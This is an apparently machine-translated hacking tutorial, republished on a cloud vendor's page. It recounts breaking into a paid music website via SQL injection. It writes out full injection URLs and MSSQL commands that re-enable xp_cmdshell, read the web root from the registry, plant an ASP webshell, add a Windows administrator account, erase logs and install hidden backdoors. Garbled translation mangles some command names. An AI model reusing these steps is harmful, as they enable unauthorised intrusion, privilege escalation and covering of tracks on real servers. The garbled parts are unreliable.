Obtain system permissions using script-only Technology

Source: Internet
Author: User

Difficulty level: Intermediate
Target Audience: script technology enthusiasts
Prerequisites: Basic knowledge of SQL Injection
WTF !" When I wrote this article, I repeatedly told you about the importance and vigor of the content, so this grievance script kid, huh, huh. In my spare time, this is definitely a real security test article, which is also very entertaining. In this article, we may be able to take a detour on some issues, but it is to give you an idea, so the key solution is the most worth learning. The authors of this article have a deep understanding of the Script Injection Vulnerability, as well as a new approach to intrusion analysis. Can you miss this article if you are interested in Script Security but have a chance to practice it?
If the previous script attacks only stayed at the web layer, this article goes deep into the system layer, because the most fascinating part of SQL is its powerful functions, many of them are the most fascinating and unknown! Many technologies in this article are definitely the first time! Come on! The secret will be unveiled!
Epoch script attacks
-- Obtain system permissions using script-only Technology
Text/figure stinking
Currently, the SQL injection vulnerability is very popular on the Internet, which is also known as the SQL injection vulnerability. We can use this vulnerability to query database information across tables and databases, and upload files through the forum to obtain the Web shell of the host (these are common methods, and anti-DDoS Pro was also described in more detail ).
Some time ago, I conducted a security test on a large music paid website. As a result, I obtained the system administrator privilege using pure script technology. So today, I will introduce you to all the experiences and my specific ideas.

I. Click
Stepping on is the top priority of a server security test. We first perform port scanning on the server. I took out a very good scanning program written by a friend. The speed is quite fast and 2000 threads can be opened at the same time! (WTF: Good !) The Port 1-is exhausted.
The open ports for scanning are as follows:
, 80, 1433,3389
The results of the second scan are the same, which is almost certainly the same. After the shock wave, the network server is much safer and it is difficult to exploit system vulnerabilities. First, I analyzed: I concentrated the target on port 21 and port 1433. Now, you only need to check your luck to see if you can get a weak password (WTF: Well, it looks pretty good !) -- Unfortunately, I haven't scanned the machine that has been weak for a long time. Today, the same is true. It seems that I only have to find a way out from the website script.

2. Comprehensive Exploration of the website
Port 1433 is enabled, that is, the sqlserver service. Generally, the website is built in an ASP + MSSQL structure, and the ASP Script Injection Vulnerability is easier to find than other script vulnerabilities, the probability of a vulnerability is also relatively high. Generally, I add single quotes after the submitted parameters. If the parameters are not filtered, ie usually returns an error message.
I quickly found a parameter that has not been filtered.
Submit http://www.something.com/script.asp? Id = 2'
IE returns:

Submit http://www.something.com/script.asp? Id = 2 and 1 = 1
IE returns a normal record.
Submit http://www.something.com/script.asp? Id = 2 and 1 = 2
No record is returned for IE.
Now, the injection vulnerability exists. We can use this vulnerability to obtain information about the server and database. For example, if you want to check the server patch, submit the following:
Http://www.something.com/script.asp? Id = 2 and 1 = (select @ Version)
An error occurred. The error message 1 is returned by IE:

Figure 1
It seems that the server has been patched with SP4. It is said that after SP4 is hit, there are also overflow programs for 80 and MSSQL SP3. However, these are "absolute secrets". It is estimated that there are few other boys except WTF. I don't have them anyway. I blackmailed him that day! Now let's continue!
This server is safe for us in terms of system, so I should proceed with the script. Let's take a look at the permissions of his database connection account and submit:
Http://www.something.com/script.asp? Id = 2 and 1 = (select is_srvrolemember ('sysadmin '))
The returned result is normal, which proves that the account currently connected is the server role SysAdmin permission.
WTF: is_srvrolemember ('role' [, 'login']) function is used to determine whether the current user logon is a member of the specified server role. Role indicates the name of the server role to be checked. Login is optional. If it is not specified, use the login account of the current user. If login is a role member, 1 is returned. If not, 0 is returned. If role or login is invalid, null is returned.
I almost never sprayed a cup of tea on a computer screen. The server role of the current connection account is SysAdmin! 2:

Figure 2
Haha! It seems that most of the connected accounts are connected using the SA account.
Submit:
Http://www.something.com/script.asp? Id = 2 and 'sa '= (select system_user)
It is used to check whether the connection account is connected with SA. ie returns normal again. This proves that the connection account is actually SA, and the permission seems to be supreme.
WTF: When an application role is used, executing Select User will return the name of the currently used application role. To obtain the identity of a logged-on user, use the transact-SQL statement: Select system_user.
At this point, many people may think of using xp_mongoshell to expand the storage process to add system accounts, and then connect to the server using the terminal. This is a very good idea! I am also a member of many people! Let's try it!

3. Use the MSSQL Stored procedure to obtain the webshell
Next, let's see if xp_mongoshell has been deleted by the administrator! Submit:
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')
IE returns the following information:

It seems that xp_cmdshell has been deleted. Let's restore it to him!
Http://www.something.com/script.asp? Id = 2; Exec master. DBO. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'
Try again to see if xp_mongoshell is recovered?
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')
WTF: In later attempts, I found that xp_mongoshell has been restored? Haha, I don't know which one of them is behind?
NO content is returned. This proves that the Administrator renamed the dynamic link library XP log70.dll. Otherwise, it seems that there is no way to restore it directly. In this regard, I can only say two words: "I am sorry "!
I am unwilling to take advantage of such a vulnerability. I am so eager to use it. Let's talk about his webshell first. Hum, after getting the webshell, I naturally have a way to deal with him. Hahaha... (Star-like smile !).
The following shows how to get webshell!
Have you read N. E. V. E. R and czy? The webshell method has been described in detail. I also wrote their methods into a program for my convenience, but it is difficult to get the absolute web path. Where can we store the generated Trojan?
This may be a problem that many cool people have been studying. Fortunately, I still know something about MSSQL. I have a way to get his absolute web path. Come with me. (WTF: this is definitely a very, very bright spot! You can see it clearly !)
Next we will use two MSSQL Stored Procedures. However, it is necessary to introduce the xp_regread extended stored procedure and the sp_makewebtask Web Assistant stored procedure: xp_regread is used to read registry information. We can use this stored procedure to obtain the absolute web path stored in the registry.
Sp_makewebtask is used to obtain webshell. Its main function is to export the records of tables in the database as files. You can specify the file name. Of course, this is an ASP script file! Imagine that if the record in the table stores the script code, the exported file is the script file. Therefore, the record we add is the script code.
Here I don't need the method of N. E. V. E. R. The method is to export a warehouse file. The exported files are relatively large, and many garbled characters seem inconvenient, if there are ASP tags in the record and there is an error ASP code, it is not easy to do it. Most of the operations will return the error code 500, so we use the czy method, is the web job to get the shell.

1. How to obtain the absolute web path?
Haha? It took me a long time to study this problem. As we all know, many Ms items are stored in the registry. The web location can be obtained in the registry. The location is as follows:
HKEY_LOCAL_MACHINE/system/controlset001/services/w3svc/parameters/virtual roots
We can use the extended stored procedure xp_regread to obtain its value.
Exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ',
'System/controlset001/services/w3svc/parameters/virtual rooms ','/'
In this way, the problem is solved, and the result is retrieved. How can we return its value in IE? My method is: first create a temporary table with a field in the table, type: Char 255. Use it to save the absolute web path value. After the table is created, we use the method of reading the Registry to save the returned value in a variable. Add a record (the value of the variable) to the new table ). In this way, the path is written to the table. Submit:
Declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ',
'System/controlset001/services/w3svc/parameters/virtual roots ','/', @ result output insert into temporary table (temporary field name) values (@ result );--
Then, we will submit: 1 = (select count (*) from temporary table where temporary field Name> 1)
In this way, ie reports an error and returns the value of the web path just inserted. I also tried to directly use the variables to report an error and asked IE to return the value of the variable. The result failed, so I thought of the method for creating a temporary table and adding data! Finally, we will delete the created temporary table. Webshell is ready, and the work has come to an end.

2. How to Get webshell?
Czy's article has been written in great detail. So here I will simply mention it! Create a table, create a field, and add Trojan content to the field. Then, export the content through the xp_makewebtask stored procedure into an ASP script and save it in the absolute web path. Delete the temporary table again. Everything is over. For example:
Execute sp_makewebtask @ outputfile = 'absolute web path/exported file name. asp ',
@ Query = 'select your field from the temporary table you created'
The result is displayed. Of course, I have all written programs, so I don't have to bother adding data in a row manually (WTF: This article has a detailed introduction! You will not be disappointed !). The methods and ideas are all written. Now let's take action.
Let's see if the two extended stored procedures have been deleted. If it is deleted, I do not want to live! Haha, submit:
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where name = 'xp _ regread ')
Submit again:
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where name = 'SP _ makewebtask ')
La la! Today is my New Year. All returns normal! Neither of the two stored procedures is deleted.
WTF Note: Generally, administrators will not delete the two, but may have little knowledge about them, so they will not pay attention to them! Crisis is here! Hey.
Okay. After obtaining the absolute web path. Continue table creation:
Http://www.something.com/script.asp? Id = 2; Create Table [DBO]. [cyfd] ([gyfd] [char] (255 ));
In this way, we have successfully created a table named cyfd, and added the field name gyfd of the char type and length of 255. Then, add data to the table:
Http://www.something.com/script.asp? Id = 2; declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System/controlset001/services/w3svc/parameters/virtual roots', '/', @ result output insert into cyfd (gyfd) values (@ result );--
Read the absolute web path from the registry, and insert the path to the created table. Then the absolute path of webshell is reported:
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from cyfd where gyfd> 1)
After an error occurs, ie returns an error. We get the absolute web path "D:/inetpub/wwwroot "! The success after hard work is very sweet! Sip tea! 3

Figure 3
Delete the created table and submit it:
Http://www.something.com/script.asp? Id = 2; drop table cyfd ;--
OK. It's much easier to do with the path. Open the webshell program I wrote and enter the vulnerability urlhttp: // www.yfd.com/yfd.com? Id = 2
Enter the absolute path to save the trojan: D:/inetpub/wwwroot.
I have already configured the trojan, and the code is simplified and streamlined. Only 30 lines of code are available, so that I can submit less data to the server. Speed up! The main function of a Trojan is to input content and save the input content as a file. With this trojan, we can upload some powerful script Trojans, such as marine Trojan.
Less than a minute. All programs have been run. Enter the corresponding path, Wahaha (WTF: Do you really like this "drink "? Haha !), Webshell comes, and the fastest speed generates a Marine Trojan, 4, Figure 5:

Figure 4

Figure 5
I live in happiness! -- WTF often says this sentence. Today it seems that I am also infected! We can still come here!

4. Restore xp_mongoshell and enter the system permission!
The following work is very simple and easy. In less than 10 minutes, I will give you an administrator account, saying that xp_mongoshell has been deleted. And it cannot be recovered. Most of the reasons are that the Administrator has deleted the xplog70.dll file or renamed it. It's okay. upload an xplog70.dll to get everything done through webshell. I soon uploaded the xplog70.dll file to the E:/inetpub/wwwroot directory. Let's restore it and submit it:
Http://www.something.com/script.asp? Id = 2; Exec master. DBO. sp_addextendedproc 'xp _ mongoshell', 'e:/inetpub/wwwroot/xplog70.dll'
Recovery: supports absolute path recovery. :) 6

Figure 6
OK. Let's use IE to check whether it has been restored. Submit:
Http://www.something.com/script.asp? Id = 2 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')
Hey. Returns normal. It has been restored. Will the following be my reference? Haha! Add account:
Http://www.something.com/script.asp? Id = 2; Exec master. DBO. xp_mongoshell 'net user chouyfd chouyfd1314yf/add'
Promote yourself as a super Administrator
Http://www.something.com/script.asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators chouyfd/add'
Complete. Open your terminal connection program and connect to it! Haha, I finally got connected. At this point, I have successfully obtained the system administrator account of this host. 7:

Figure 7
The following job is to clear logs and leave a super backdoor!

5. post-event handling
After connecting to the terminal, clear IIS logs and MSSQL logs as quickly as possible.
At the same time, delete xp_mongoshell to him, so it is not easy to let him discover it. Then, move the xplog70.dll I uploaded to the System32 directory. I don't know what it means to change it to: msxlog32.dll (I can't find it when I killed it, haha !) Install the super Kernel Backdoor program provided by X. Then, patch the vulnerability script file. At the same time, in his script program, I modified the code and submitted specific parameters (post prompt mode) to display my web backdoor program! These two backdoors are safe! What do you fear? Happy New Year!

Note: There may be many places in the article that you don't understand and have limited space. If necessary, please contact me directly! : Dy-e@163.net, this time with script technology to get the system administrator account. This is also the result of my in-depth study of MSSQL for a long time. This article mainly aims to show the ideas of intrusion. There are many ways to intrude into the system. I hope this article will help you and wish you a happy Year of the Monkey and all the best!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.